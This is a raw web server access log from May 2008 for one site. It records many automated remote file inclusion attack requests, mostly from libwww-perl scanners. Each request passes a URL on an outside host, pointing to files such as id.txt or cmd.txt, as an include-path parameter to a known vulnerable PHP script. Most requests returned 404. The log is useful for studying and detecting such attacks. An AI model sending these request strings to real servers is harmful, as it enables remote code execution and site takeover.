200.234.200.124 - - [24/May/2008:11:45:45 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:45:46 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:45:46 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:45:47 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:45:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:52 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:52 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:52 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:54 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:54 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:55 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:57 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:58 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:45:58 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:46:02 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:46:02 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:46:02 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:46:04 -0700] "GET /classes/core/language.php?rootdir=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:46:04 -0700] "GET /logs/classes/core/language.php?rootdir=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:11:46:05 -0700] "GET /logs/access.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:11:46:05 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:11:46:05 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:11:46:05 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:11:46:06 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:46:32 -0700] "GET /logs//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:46:32 -0700] "GET //smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:11:46:32 -0700] "GET /logs/access.log/include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:46:57 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.7.147.137 - - [24/May/2008:11:47:06 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
196.7.147.137 - - [24/May/2008:11:47:06 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:47:08 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:47:20 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:47:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:11:47:21 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:24 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:24 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:25 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.251.172 - - [24/May/2008:11:47:25 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:25 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.80.42.159 - - [24/May/2008:11:47:36 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [24/May/2008:11:47:39 -0700] "GET /index.php?option=com_custompages&cpage=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [24/May/2008:11:47:40 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:47:51 -0700] "GET /logs/access_080124.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:47:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [24/May/2008:11:47:57 -0700] "GET /logs//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [24/May/2008:11:47:57 -0700] "GET //smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:57 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:58 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:47:59 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:48:02 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [24/May/2008:11:48:14 -0700] "GET /logs//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [24/May/2008:11:48:14 -0700] "GET //smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [24/May/2008:11:48:27 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:11:48:32 -0700] "GET /logs/access.log//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:48:34 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:48:34 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:48:35 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:48:40 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:48:55 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:48:56 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:48:56 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.112.34.165 - - [24/May/2008:11:49:34 -0700] "GET /logs/?mosConfig_absolute_path=http://vivace.biz/test.txt??? HTTP/1.1" 200 48843 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.112.34.165 - - [24/May/2008:11:49:40 -0700] "GET /?mosConfig_absolute_path=http://vivace.biz/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:49:41 -0700] "GET /logs//calendar.php?l=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:49:41 -0700] "GET //calendar.php?l=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:11:49:44 -0700] "GET /logs/access_080306.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:11:49:56 -0700] "GET //calendar.php?l=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:11:49:56 -0700] "GET /logs//calendar.php?l=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:11:50:12 -0700] "GET //calendar.php?l=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:11:50:12 -0700] "GET /logs//calendar.php?l=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:11:50:38 -0700] "GET /logs/access_071223.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
83.102.242.34 - - [24/May/2008:11:50:38 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
83.244.130.90 - - [24/May/2008:11:50:42 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:11:50:42 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:11:50:58 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:11:50:59 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
143.248.136.2 - - [24/May/2008:11:51:29 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.105.6 - - [24/May/2008:11:52:25 -0700] "GET /logs//raidsignup/announcements.php?phpraid_dir=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.48.105.6 - - [24/May/2008:11:52:26 -0700] "GET //raidsignup/announcements.php?phpraid_dir=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:11:52:29 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:11:52:30 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:52:45 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:52:45 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:52:46 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.156.181 - - [24/May/2008:11:53:24 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.156.181 - - [24/May/2008:11:53:24 -0700] "GET //admin/classes/TplLoad.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.156.181 - - [24/May/2008:11:53:24 -0700] "GET /logs//admin/classes/TplLoad.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:53:27 -0700] "GET /logs/access_080312.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:53:29 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:53:32 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.236.255.134 - - [24/May/2008:11:53:48 -0700] "GET /config.php?path_to_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:53:52 -0700] "GET /logs/access_080123.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.72 - - [24/May/2008:11:54:05 -0700] "GET /logs/amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.25.195.72 - - [24/May/2008:11:54:05 -0700] "GET /amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:11:54:33 -0700] "GET /logs/access_080215.log//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:54:51 -0700] "GET /logs/access_080215.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:54:56 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:54:58 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:55:08 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:55:11 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:55:22 -0700] "GET /logs/access.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.156.181 - - [24/May/2008:11:55:53 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:55:57 -0700] "GET /logs/access.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:55:58 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:55:59 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:11:56:27 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:11:56:32 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:11:56:36 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.193.199 - - [24/May/2008:11:56:39 -0700] "GET /logs//modules/Forums/favorites.php?nuke_bb_root_path=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
